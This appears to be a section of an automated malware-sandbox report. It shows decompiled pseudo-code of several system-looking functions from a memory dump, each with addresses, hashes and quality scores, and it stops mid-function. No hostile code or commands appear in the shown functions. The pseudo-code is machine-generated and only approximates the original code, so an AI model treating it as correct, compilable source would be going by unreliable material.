                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168FD9B, Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0168FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E016676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                      0x0168fd9b
                                                      0x0168fda0
                                                      0x0168fda1
                                                      0x0168fdab
                                                      0x0168fdad
                                                      0x0168fdb0
                                                      0x0168fdb8
                                                      0x0168fe0f
                                                      0x0168fde6
                                                      0x0168fde9
                                                      0x0168fdec
                                                      0x016cc0c0
                                                      0x0168fdfe
                                                      0x0168fe06
                                                      0x0168fe06
                                                      0x016cc0c8
                                                      0x0168fe2d
                                                      0x0168fe2d
                                                      0x00000000
                                                      0x0168fe2d
                                                      0x016cc0d1
                                                      0x016cc0e0
                                                      0x016cc0e5
                                                      0x016cc0e5
                                                      0x016cc0e8
                                                      0x00000000
                                                      0x016cc0e8
                                                      0x0168fdf4
                                                      0x00000000
                                                      0x00000000
                                                      0x0168fdf6
                                                      0x0168fdfa
                                                      0x0168fe1a
                                                      0x0168fe1f
                                                      0x0168fe1f
                                                      0x0168fdfc
                                                      0x00000000
                                                      0x0168fdfc
                                                      0x0168fdcc
                                                      0x0168fdd0
                                                      0x0168fe26
                                                      0x00000000
                                                      0x0168fe26
                                                      0x0168fdd8
                                                      0x0168fddb
                                                      0x0168fddd
                                                      0x0168fde0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: ba4b87a15eea2141b150e91847cdf2de6d387077ea34a0f5143ab8d52951da38
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: 4E217972600A41EBD731DF0DC944A66F7E5EB94A10F2482AEEA4987711D771AC01CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168B390, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0168B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01672280(_t12, 0x1748608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E016900C2(0x1748608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                      0x0168b395
                                                      0x0168b3a2
                                                      0x0168b3a5
                                                      0x0168b3aa
                                                      0x0168b3b2
                                                      0x0168b3ba
                                                      0x0168b3bd
                                                      0x0168b3c0
                                                      0x0168b3c4
                                                      0x0168b3c9
                                                      0x016ca3e9
                                                      0x016ca3ed
                                                      0x016ca3f0
                                                      0x016ca3ff
                                                      0x016ca403
                                                      0x016ca409
                                                      0x00000000
                                                      0x00000000
                                                      0x016ca40b
                                                      0x016ca40b
                                                      0x016ca40f
                                                      0x016ca415
                                                      0x016ca423
                                                      0x016ca423
                                                      0x016ca415
                                                      0x0168b3d1
                                                      0x0168b3e8
                                                      0x0168b3e8
                                                      0x0168b3d9

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a33eb81ca41dbf6ba682a54f1ebbc36fd0b0a277a42a6f462e81b5974236db29
                                                      • Instruction ID: e35960e473d6ffd9c43e5bb0a191099d36b8e4912427e93df62a637d61a3168f
                                                      • Opcode Fuzzy Hash: a33eb81ca41dbf6ba682a54f1ebbc36fd0b0a277a42a6f462e81b5974236db29
                                                      • Instruction Fuzzy Hash: 7F118E333051249FCB19DA989D81A3BB35BEBC5730B28423DDD2AC7380DA319C02C6D5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01659240, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E01659240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x172f708);
				E016AD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E016995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E016995D0();
				_t33 =  *0x17484c4; // 0x0
				L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x17484c4; // 0x0
				L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x17484c4; // 0x0
				E01672280(L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E016995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E016995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01659325();
					_t50 =  *0x17484c4; // 0x0
					return E016AD0D1(L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                      0x01659240
                                                      0x01659242
                                                      0x01659247
                                                      0x0165924c
                                                      0x0165924e
                                                      0x01659255
                                                      0x01659257
                                                      0x0165925a
                                                      0x0165925f
                                                      0x0165925f
                                                      0x01659266
                                                      0x01659271
                                                      0x01659276
                                                      0x01659279
                                                      0x0165927e
                                                      0x01659295
                                                      0x0165929a
                                                      0x016592b1
                                                      0x016592b6
                                                      0x016592d7
                                                      0x016592dc
                                                      0x016592e0
                                                      0x016592e6
                                                      0x016592e8
                                                      0x016592ee
                                                      0x01659332
                                                      0x01659333
                                                      0x01659337
                                                      0x01659338
                                                      0x0165933a
                                                      0x0165933a
                                                      0x0165933d
                                                      0x01659342
                                                      0x01659342
                                                      0x01659345
                                                      0x01659349
                                                      0x0165934e
                                                      0x01659352
                                                      0x01659357
                                                      0x016592f4
                                                      0x016592f4
                                                      0x016592f6
                                                      0x016592f9
                                                      0x01659300
                                                      0x01659306
                                                      0x01659324
                                                      0x01659324

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 153d7457cdd436645196523eda7e82ad81882d4f08b50ae9b3bc9c48fd7a5ad8
                                                      • Instruction ID: 543dc6109bd2b431b1db53dc76bb0fcea115fe9df4830a25f7f842e3c5674c84
                                                      • Opcode Fuzzy Hash: 153d7457cdd436645196523eda7e82ad81882d4f08b50ae9b3bc9c48fd7a5ad8
                                                      • Instruction Fuzzy Hash: 3A212572041601DFC762EF68CE40F1AB7BAFF28718F15856DE149866A2CB34E942CB48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E4257, Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E016E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x17308d0);
				E016AD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E016E41E8(__ebx, __edi, __ecx, _t39);
				E0166EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x17487e4;
					_t18 =  *0x17487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1745cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x17487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x17487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01657055(_t31 + 0xfffffff8);
								_t24 =  *0x17487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x17487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1745cd0;
				if( *0x1745cd0 <= 0) {
					L01657055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x17487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x17487e8 = _t30;
						 *0x17487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E016AD0D1(L016E4320());
			}















                                                      0x016e4257
                                                      0x016e4257
                                                      0x016e4257
                                                      0x016e4259
                                                      0x016e425e
                                                      0x016e4263
                                                      0x016e4265
                                                      0x016e4273
                                                      0x016e4278
                                                      0x016e427c
                                                      0x016e427f
                                                      0x016e4281
                                                      0x016e4287
                                                      0x016e42d7
                                                      0x016e42d7
                                                      0x016e42da
                                                      0x016e428d
                                                      0x016e428d
                                                      0x016e428f
                                                      0x016e4292
                                                      0x016e4297
                                                      0x016e429c
                                                      0x016e42a0
                                                      0x016e42a6
                                                      0x016e42a8
                                                      0x016e42ae
                                                      0x016e42b3
                                                      0x00000000
                                                      0x016e42ba
                                                      0x016e42ba
                                                      0x016e42bf
                                                      0x016e42c5
                                                      0x016e42ca
                                                      0x016e42cf
                                                      0x016e42d0
                                                      0x00000000
                                                      0x016e42d0
                                                      0x016e42b3
                                                      0x00000000
                                                      0x016e42a6
                                                      0x016e429c
                                                      0x016e42dc
                                                      0x016e42dc
                                                      0x016e42e3
                                                      0x016e4309
                                                      0x016e42e5
                                                      0x016e42e5
                                                      0x016e42e8
                                                      0x016e42ee
                                                      0x016e42f0
                                                      0x00000000
                                                      0x016e42f2
                                                      0x016e42f2
                                                      0x016e42f4
                                                      0x016e42f7
                                                      0x016e42f9
                                                      0x016e4300
                                                      0x016e4300
                                                      0x016e42f0
                                                      0x016e430e
                                                      0x016e431f

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a738d4b98885497308a06c037b665c12fb3ec7e3ef672c866c3c474971d793c
                                                      • Instruction ID: 0ed9237b6bfdc14f5d21e9369a96fd89c78e4f2f8e0a2bf5844d006b43cb051d
                                                      • Opcode Fuzzy Hash: 9a738d4b98885497308a06c037b665c12fb3ec7e3ef672c866c3c474971d793c
                                                      • Instruction Fuzzy Hash: D8218878502606CFCB26EFA8D814A24BBE2FF85324B50C26FC115CB799EB318491CF06
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01682397, Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 25%
                                                      			E01682397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x174848c != 0) {
					L0167FAD0(0x1748610);
					if( *0x174848c == 0) {
						E0167FA00(0x1748610, _t19, _t27, 0x1748610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01682581(0x1748610, 0x16350a0, _t26, _t27, _t28);
						E0167FA00(0x1748610, 0x16350a0, _t27, 0x1748610);
					}
				} else {
					L1:
					_t11 =  *0x1748614; // 0x0
					if(_t11 == 0) {
						_t11 = E01694886(0x1631088, 1, 0x1748614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01682581(0x1748610, (_t11 << 4) + 0x1635070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                      0x016823b0
                                                      0x016823b6
                                                      0x01682409
                                                      0x01682415
                                                      0x016c5ae9
                                                      0x00000000
                                                      0x0168241b
                                                      0x0168241b
                                                      0x0168241d
                                                      0x01682427
                                                      0x0168242e
                                                      0x01682430
                                                      0x01682430
                                                      0x016823b8
                                                      0x016823b8
                                                      0x016823b8
                                                      0x016823bf
                                                      0x016823fc
                                                      0x016823fc
                                                      0x016823c1
                                                      0x016823c3
                                                      0x016823d0
                                                      0x016823d8
                                                      0x016823d8
                                                      0x016823dc
                                                      0x016823de
                                                      0x016823e1
                                                      0x016823e1
                                                      0x016823ec

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e185220543198861dae5a4d0fe3f0c05f7a6151aba1703c7923382f5990ffe91
                                                      • Instruction ID: f01e7c4c13351e937144031edf1d7b3375c9c7c24423f4fe27e1b2bebd3025f7
                                                      • Opcode Fuzzy Hash: e185220543198861dae5a4d0fe3f0c05f7a6151aba1703c7923382f5990ffe91
                                                      • Instruction Fuzzy Hash: D4112B71744301A7E730BA6D9CA0F16B799FBA0720F14812EFA0297281DBB0E801C759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D46A7, Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E016D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0169F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0168D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L016777F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                      0x016d46b7
                                                      0x016d46ba
                                                      0x016d46c5
                                                      0x016d46c8
                                                      0x016d46d0
                                                      0x016d46d4
                                                      0x016d46e6
                                                      0x016d46e9
                                                      0x016d46f4
                                                      0x016d46ff
                                                      0x016d4705
                                                      0x016d4706
                                                      0x016d470c
                                                      0x016d4713
                                                      0x016d471b
                                                      0x016d4723
                                                      0x016d4725
                                                      0x016d46d6
                                                      0x016d46d9
                                                      0x016d46db
                                                      0x016d46db
                                                      0x016d4732

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction ID: 24b84bd3bbf12dfe06f0291308754a0f2863f76805a2e29e7247b0fa22b2169f
                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction Fuzzy Hash: D511C272904208BBCB159F5C98808BEBBB9EF95310F1080AEF944C7351DA318D55D7A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165C962, Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 42%
                                                      			E0165C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x174d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0166EEF0(0x17470a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E016DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0166EB70(_t29, 0x17470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0169B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E016DF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x17470c0; // 0x0
					while(_t38 != 0x17470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x174b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                      0x0165c96a
                                                      0x0165c974
                                                      0x0165c988
                                                      0x0165c98a
                                                      0x016c7c9d
                                                      0x016c7c9f
                                                      0x016c7ca4
                                                      0x016c7cae
                                                      0x016c7cf0
                                                      0x016c7cf5
                                                      0x016c7cfa
                                                      0x0165c992
                                                      0x0165c996
                                                      0x0165c997
                                                      0x0165c998
                                                      0x0165c9a3
                                                      0x0165c9a3
                                                      0x016c7cb0
                                                      0x016c7cb7
                                                      0x016c7cbb
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7cbd
                                                      0x016c7ce8
                                                      0x016c7cc5
                                                      0x016c7cc8
                                                      0x016c7cca
                                                      0x016c7cd0
                                                      0x016c7cd6
                                                      0x016c7cde
                                                      0x016c7ce4
                                                      0x016c7ce4
                                                      0x016c7cd0
                                                      0x00000000
                                                      0x016c7ce8
                                                      0x0165c990
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5ae72c3ce835af68bc2f0c2b2f80b90db8f9fa0b567762f119e9045bc41bee3
                                                      • Instruction ID: d3765bba5162ac01813fbfcb19d69d7a8089aea1fe0c8d1fc9155fb38c9aeb20
                                                      • Opcode Fuzzy Hash: f5ae72c3ce835af68bc2f0c2b2f80b90db8f9fa0b567762f119e9045bc41bee3
                                                      • Instruction Fuzzy Hash: 1011E1367006079FCB24AF7DDC95A2BBBE6FB94A14B00052DE94283661EB21EC11CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016937F5, Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E016937F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01672280(_t6, 0x1748550);
				}
				_t29 = E0169387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0166FFB0(0x1748550, _t27, 0x1748550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                      0x016937fa
                                                      0x016937fc
                                                      0x01693805
                                                      0x01693808
                                                      0x01693808
                                                      0x01693814
                                                      0x01693818
                                                      0x01693846
                                                      0x01693848
                                                      0x0169384b
                                                      0x0169384b
                                                      0x01693852
                                                      0x00000000
                                                      0x01693854
                                                      0x01693856
                                                      0x00000000
                                                      0x00000000
                                                      0x01693863
                                                      0x00000000
                                                      0x01693863
                                                      0x0169381a
                                                      0x0169381a
                                                      0x0169381f
                                                      0x0169386e
                                                      0x0169386e
                                                      0x01693871
                                                      0x01693873
                                                      0x01693873
                                                      0x01693868
                                                      0x00000000
                                                      0x01693868
                                                      0x01693821
                                                      0x01693826
                                                      0x00000000
                                                      0x00000000
                                                      0x01693828
                                                      0x0169382a
                                                      0x01693841
                                                      0x00000000
                                                      0x01693841

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d862107c45307a6821a1983050a861e205d3c4939e5a7c1719356c5cf32a1a0a
                                                      • Instruction ID: df9ddd406c33af3230156c595bed5e746b79918db660bf5dba9e636eda4b910f
                                                      • Opcode Fuzzy Hash: d862107c45307a6821a1983050a861e205d3c4939e5a7c1719356c5cf32a1a0a
                                                      • Instruction Fuzzy Hash: 6001C4B2A016119BCB378A2D9F40A26BBAEFF85A60717406DE9468F315D730C801C7C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168002D, Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0168002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01677D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01677D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01677D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01677D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                      0x01680032
                                                      0x01680037
                                                      0x01680043
                                                      0x016c4b3a
                                                      0x01680049
                                                      0x01680049
                                                      0x01680049
                                                      0x0168004e
                                                      0x01680053
                                                      0x016c4b48
                                                      0x016c4b5a
                                                      0x016c4b4a
                                                      0x016c4b53
                                                      0x016c4b53
                                                      0x016c4b5f
                                                      0x00000000
                                                      0x016c4b61
                                                      0x00000000
                                                      0x016c4b61
                                                      0x01680059
                                                      0x01680059
                                                      0x01680060
                                                      0x016c4b6f
                                                      0x016c4b6f
                                                      0x01680069
                                                      0x016c4b83
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4b90
                                                      0x016c4b9b
                                                      0x016c4b9b
                                                      0x016c4ba4
                                                      0x00000000
                                                      0x00000000
                                                      0x016c4baa
                                                      0x00000000
                                                      0x0168006f
                                                      0x0168006f
                                                      0x00000000
                                                      0x0168006f
                                                      0x01680069

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: 77c461664090c44f6f889fc2f0de6d8c35f8c2ce45b0816aaf6dbfeea2f5e733
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: F511C4336056828FE723E76CDD68B357BD5EF41B54F0904A8EE1487792EB29D882C264
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166766D, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E0166766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
